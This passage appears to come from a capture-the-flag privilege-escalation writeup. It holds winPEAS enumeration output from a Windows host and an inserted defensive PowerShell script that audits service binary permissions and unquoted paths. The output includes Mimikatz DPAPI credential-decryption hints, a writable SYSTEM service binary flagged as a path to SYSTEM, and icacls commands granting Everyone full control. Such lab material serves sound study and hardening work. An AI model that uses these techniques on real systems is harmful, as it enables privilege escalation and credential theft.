C:\Windows\PSSDNSVC.EXE NT AUTHORITY\SYSTEM:(I)(F)
TrustedInstaller
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe NT SERVICE\TrustedInstaller:(F)
WindowsScheduler
C:\PROGRA~2\SYSTEM~1\WService.exe
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(F)
Everyone:(I)(M)
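The two findings winPEAS reports above, a service binary that Everyone can overwrite (WService.exe with Everyone:(F)) and service paths that are not quoted, are exactly what a host review should catch before an attacker does. The following PowerShell is an added example written for this writeup, not part of winPEAS or the original post; it assumes it is run from an elevated prompt on the host being reviewed and uses only built-in cmdlets (Get-CimInstance, Get-Acl, Get-Item). The list of low-privileged principals it treats as "weak" is an assumption you may want to extend.

```powershell
# Added example (not from the original writeup): audit Windows services for the two
# weaknesses flagged above: a service binary writable by low-privileged principals
# and an unquoted service path containing spaces.
# Run from an elevated PowerShell prompt on the host being reviewed.

# Assumption: these principals are considered low-privileged; extend as needed.
$weakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these rights lets the holder replace or tamper with the binary.
$writeRights = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, WriteData, AppendData, TakeOwnership, ChangePermissions'

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # Strip arguments: a quoted path ends at the closing quote,
    # an unquoted one at the first ".exe" (case-insensitive, so PSSDNSVC.EXE also matches).
    if (-not $PathName) { return $null }
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }
    return $PathName
}

function Test-WeakBinaryAcl {
    param([string]$Path)
    if (-not $Path) { return $null }
    # Get-Item resolves 8.3 short names such as C:\PROGRA~2\SYSTEM~1\WService.exe
    $item = Get-Item -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $item) { return $null }
    $acl = Get-Acl -LiteralPath $item.FullName
    $acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $weakPrincipals -contains $_.IdentityReference.Value -and
        (($_.FileSystemRights -band $writeRights) -ne 0)
    } | ForEach-Object { '{0}:{1}' -f $_.IdentityReference, $_.FileSystemRights }
}

# Report every service whose binary path is unquoted (and contains a space)
# or whose binary grants write-class rights to a weak principal.
Get-CimInstance Win32_Service | ForEach-Object {
    $svc      = $_
    $bin      = Get-ServiceBinaryPath $svc.PathName
    $unquoted = ($svc.PathName -notmatch '^"') -and ($bin -match ' ')
    $weak     = Test-WeakBinaryAcl $bin
    if ($unquoted -or $weak) {
        [pscustomobject]@{
            Service    = $svc.Name
            RunsAs     = $svc.StartName
            Binary     = $bin
            Unquoted   = $unquoted
            WeakAccess = ($weak -join '; ')
        }
    }
} | Format-Table -AutoSize
```

On the host above this would list WindowsScheduler with WeakAccess populated (Everyone holds FullControl on WService.exe) and AWSLiteAgent as Unquoted. The fixes are the ones winPEAS implies: quote the path with `sc.exe config <service> binPath= "\"C:\full\path\service.exe\""`, and remove the Everyone grant on the binary with `icacls <binary> /remove:g Everyone`, leaving only SYSTEM and Administrators with Full control. Both the binary ACL and the registry ImagePath should be re-checked after the change, because a service running as LocalSystem whose executable any user can replace is a direct path to SYSTEM.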
[*] DLL HIJACKING in PATHenv variable
[i] Maybe you can take advantage of modifying/creating some binary in some of the following locations
[i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dll-hijacking
C:\Windows\system32 NT SERVICE\TrustedInstaller:(F)
C:\Windows NT SERVICE\TrustedInstaller:(F)
C:\Windows\System32\Wbem NT SERVICE\TrustedInstaller:(F)
[*] CREDENTIALS
[+] WINDOWS VAULT
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#windows-vault
Currently stored credentials:
* NONE *
[+] DPAPI MASTER KEYS
[i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
[+] DPAPI MASTER KEYS
[i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt
[i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module
[?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi
Looking inside C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Credentials\
Looking inside C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\
WINPEAS DIDN'T WORK PROPERLY, LET'S GIVE IT FULL PERMISSIONS:
icacls winPEAS.bat /grant Everyone:(RX)
icacls winPEAS.bat /grant Everyone:F
WE TRIED WINPEAS IN SEVERAL WAYS, GRANTING PERMISSIONS, BUT IT ONLY HALF WORKS; SO WE GOT THE INSTALL DATE WITH A MORE DIRECT COMMAND, SINCE ON THE FORUMS EVERYONE ELSE HAD THE SAME PROBLEM TOO:
c:\windows\system32\inetsrv>systeminfo | findstr /i date
Original Install Date: 8/3/2019, 10:43:23 AM
Last updated